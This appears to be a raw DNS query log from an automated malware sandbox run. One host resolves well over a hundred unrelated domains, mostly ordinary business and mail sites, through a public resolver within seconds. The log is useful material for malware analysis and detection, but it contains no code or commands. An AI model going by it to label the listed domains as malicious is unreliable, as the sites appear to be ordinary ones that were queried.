                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.778177977 CET192.168.2.58.8.8.80xfc1fStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.890749931 CET192.168.2.58.8.8.80x7362Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.988365889 CET192.168.2.58.8.8.80xc43Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.015652895 CET192.168.2.58.8.8.80x52ffStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.016685009 CET192.168.2.58.8.8.80xb37fStandard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.171561956 CET192.168.2.58.8.8.80x566Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.265353918 CET192.168.2.58.8.8.80x48cfStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.516279936 CET192.168.2.58.8.8.80xa2b2Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.516546965 CET192.168.2.58.8.8.80xeec6Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.656393051 CET192.168.2.58.8.8.80x142cStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.671108007 CET192.168.2.58.8.8.80xdb21Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.722481012 CET192.168.2.58.8.8.80xce8cStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:27.738179922 CET192.168.2.58.8.8.80xb9b4Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.013290882 CET192.168.2.58.8.8.80x839Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.200007915 CET192.168.2.58.8.8.80xaa5dStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.205497980 CET192.168.2.58.8.8.80xcbe8Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.243381977 CET192.168.2.58.8.8.80x870fStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.382441998 CET192.168.2.58.8.8.80x5de2Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.710516930 CET192.168.2.58.8.8.80xc775Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.731636047 CET192.168.2.58.8.8.80xdb21Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:28.766582966 CET192.168.2.58.8.8.80x7b8aStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.278395891 CET192.168.2.58.8.8.80x277bStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.288058043 CET192.168.2.58.8.8.80x46dStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.326174021 CET192.168.2.58.8.8.80xd2b5Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.333400965 CET192.168.2.58.8.8.80xa72bStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.341223001 CET192.168.2.58.8.8.80x12adStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.454562902 CET192.168.2.58.8.8.80x3d5Standard query (0)mail.protonmail.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.458477020 CET192.168.2.58.8.8.80xf849Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.591609955 CET192.168.2.58.8.8.80x50f0Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.758093119 CET192.168.2.58.8.8.80x94a3Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:29.760162115 CET192.168.2.58.8.8.80x5ac4Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:30.910578012 CET192.168.2.58.8.8.80xf55fStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:30.965323925 CET192.168.2.58.8.8.80x225bStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:30.994390965 CET192.168.2.58.8.8.80x87f8Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.022804022 CET192.168.2.58.8.8.80x4083Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.036637068 CET192.168.2.58.8.8.80xdb21Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.066221952 CET192.168.2.58.8.8.80x3f44Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.067264080 CET192.168.2.58.8.8.80x9e40Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.075107098 CET192.168.2.58.8.8.80xae74Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.178210020 CET192.168.2.58.8.8.80x1a96Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.259516954 CET192.168.2.58.8.8.80x6aedStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.271723032 CET192.168.2.58.8.8.80x485fStandard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.273811102 CET192.168.2.58.8.8.80x9aebStandard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.275762081 CET192.168.2.58.8.8.80x6860Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.276577950 CET192.168.2.58.8.8.80x6db3Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.278413057 CET192.168.2.58.8.8.80x7b7dStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.287045002 CET192.168.2.58.8.8.80x2292Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.293850899 CET192.168.2.58.8.8.80xf54Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.295104027 CET192.168.2.58.8.8.80x539Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.296088934 CET192.168.2.58.8.8.80xf1abStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.298424006 CET192.168.2.58.8.8.80x5e43Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.300254107 CET192.168.2.58.8.8.80x8709Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.303433895 CET192.168.2.58.8.8.80xeba0Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.316529989 CET192.168.2.58.8.8.80xc358Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.339667082 CET192.168.2.58.8.8.80x9c2Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.348845959 CET192.168.2.58.8.8.80xaf54Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.404778957 CET192.168.2.58.8.8.80x276dStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.412669897 CET192.168.2.58.8.8.80x21feStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.415796041 CET192.168.2.58.8.8.80x56aaStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.442488909 CET192.168.2.58.8.8.80xd1f3Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.445486069 CET192.168.2.58.8.8.80x43adStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.484653950 CET192.168.2.58.8.8.80xc4efStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.496603012 CET192.168.2.58.8.8.80xb193Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.498769045 CET192.168.2.58.8.8.80x248Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.535450935 CET192.168.2.58.8.8.80x1385Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.541063070 CET192.168.2.58.8.8.80x79b9Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.545897007 CET192.168.2.58.8.8.80xa110Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.548960924 CET192.168.2.58.8.8.80xda69Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.571222067 CET192.168.2.58.8.8.80xa403Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.719291925 CET192.168.2.58.8.8.80xcbe9Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.727003098 CET192.168.2.58.8.8.80x2500Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.813421011 CET192.168.2.58.8.8.80x558fStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.885951996 CET192.168.2.58.8.8.80x5f18Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.907337904 CET192.168.2.58.8.8.80xbceStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:31.973202944 CET192.168.2.58.8.8.80xea8fStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.004313946 CET192.168.2.58.8.8.80x967fStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.056097984 CET192.168.2.58.8.8.80x3cd9Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.205662012 CET192.168.2.58.8.8.80x124cStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.207591057 CET192.168.2.58.8.8.80x8e74Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.229166985 CET192.168.2.58.8.8.80x3f22Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.264863968 CET192.168.2.58.8.8.80x6860Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.281296968 CET192.168.2.58.8.8.80xe3d5Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.298712015 CET192.168.2.58.8.8.80x1827Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.312288046 CET192.168.2.58.8.8.80x7b7dStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.420942068 CET192.168.2.58.8.8.80x43adStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.450541973 CET192.168.2.58.8.8.80xdaccStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.455977917 CET192.168.2.58.8.8.80x798fStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.629508972 CET192.168.2.58.8.8.80x539Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.749943018 CET192.168.2.58.8.8.80xf0f8Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:32.894756079 CET192.168.2.58.8.8.80x967Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.031749964 CET192.168.2.58.8.8.80xed51Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.078557968 CET192.168.2.58.8.8.80x3cd9Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.164690971 CET192.168.2.58.8.8.80x536eStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.198507071 CET192.168.2.58.8.8.80xdce2Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.201098919 CET192.168.2.58.8.8.80xa5ffStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.235755920 CET192.168.2.58.8.8.80x88cfStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.274749994 CET192.168.2.58.8.8.80xbe2Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.279552937 CET192.168.2.58.8.8.80x5150Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.282605886 CET192.168.2.58.8.8.80x6860Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.320893049 CET192.168.2.58.8.8.80x9761Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.329816103 CET192.168.2.58.8.8.80x8450Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.494019985 CET192.168.2.58.8.8.80x23c5Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.611087084 CET192.168.2.58.8.8.80xc599Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.692714930 CET192.168.2.58.8.8.80xd4f7Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.706439018 CET192.168.2.58.8.8.80xc2e0Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.766434908 CET192.168.2.58.8.8.80xf0f8Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.781100988 CET192.168.2.58.8.8.80x62d3Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.783550978 CET192.168.2.58.8.8.80x92a2Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.798130035 CET192.168.2.58.8.8.80xd789Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.944380999 CET192.168.2.58.8.8.80xf9bcStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:33.982105970 CET192.168.2.58.8.8.80x9891Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.099215984 CET192.168.2.58.8.8.80x8b09Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.144495964 CET192.168.2.58.8.8.80xd37cStandard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.165009975 CET192.168.2.58.8.8.80x6304Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.180617094 CET192.168.2.58.8.8.80x6236Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.220434904 CET192.168.2.58.8.8.80xff5Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.299288988 CET192.168.2.58.8.8.80x46fbStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.320943117 CET192.168.2.58.8.8.80x9761Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.501054049 CET192.168.2.58.8.8.80x23c5Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.676415920 CET192.168.2.58.8.8.80xf289Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.801141977 CET192.168.2.58.8.8.80x5681Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.817620039 CET192.168.2.58.8.8.80x62d3Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.819971085 CET192.168.2.58.8.8.80xe6f9Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.819971085 CET192.168.2.58.8.8.80x6550Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.819971085 CET192.168.2.58.8.8.80x5202Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.820710897 CET192.168.2.58.8.8.80x7a9bStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.821469069 CET192.168.2.58.8.8.80x5ef6Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.821949959 CET192.168.2.58.8.8.80x646Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.822644949 CET192.168.2.58.8.8.80x86ddStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.822747946 CET192.168.2.58.8.8.80xb78eStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.823185921 CET192.168.2.58.8.8.80x1dbStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.828934908 CET192.168.2.58.8.8.80x6808Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.828934908 CET192.168.2.58.8.8.80x45e0Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.833791018 CET192.168.2.58.8.8.80x1e0eStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.833791971 CET192.168.2.58.8.8.80xef98Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.833791971 CET192.168.2.58.8.8.80x5d8Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.834467888 CET192.168.2.58.8.8.80xfeeeStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.834888935 CET192.168.2.58.8.8.80x7fe0Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.834888935 CET192.168.2.58.8.8.80x1464Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.836137056 CET192.168.2.58.8.8.80x6c2bStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.836137056 CET192.168.2.58.8.8.80x422fStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.836678982 CET192.168.2.58.8.8.80x60f2Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.837141037 CET192.168.2.58.8.8.80x2901Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.837408066 CET192.168.2.58.8.8.80x4fdcStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.838490009 CET192.168.2.58.8.8.80xe35cStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.839140892 CET192.168.2.58.8.8.80xc65cStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.839440107 CET192.168.2.58.8.8.80x2cd6Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.843410969 CET192.168.2.58.8.8.80xc85dStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.845228910 CET192.168.2.58.8.8.80xd1c8Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.845834017 CET192.168.2.58.8.8.80x13c0Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.847203016 CET192.168.2.58.8.8.80x4402Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.847549915 CET192.168.2.58.8.8.80x2c0fStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.848057985 CET192.168.2.58.8.8.80x132cStandard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.848499060 CET192.168.2.58.8.8.80x2973Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.848853111 CET192.168.2.58.8.8.80x1440Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.848853111 CET192.168.2.58.8.8.80x5652Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.855211020 CET192.168.2.58.8.8.80xb9b3Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.855211020 CET192.168.2.58.8.8.80x47e5Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.867373943 CET192.168.2.58.8.8.80x11c4Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.869581938 CET192.168.2.58.8.8.80x26bcStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.885443926 CET192.168.2.58.8.8.80x4f21Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.885443926 CET192.168.2.58.8.8.80xb9f4Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.885443926 CET192.168.2.58.8.8.80xead2Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.886941910 CET192.168.2.58.8.8.80x6302Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.895035028 CET192.168.2.58.8.8.80xc8f8Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.895035028 CET192.168.2.58.8.8.80xe9afStandard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.898905039 CET192.168.2.58.8.8.80x5029Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.903542995 CET192.168.2.58.8.8.80xf3c7Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.907082081 CET192.168.2.58.8.8.80xba84Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.907428026 CET192.168.2.58.8.8.80x72f6Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.908266068 CET192.168.2.58.8.8.80x5d1fStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.910569906 CET192.168.2.58.8.8.80xcc5bStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:34.914202929 CET192.168.2.58.8.8.80x5032Standard query (0)duiops.netA (IP address)IN (0x0001)false
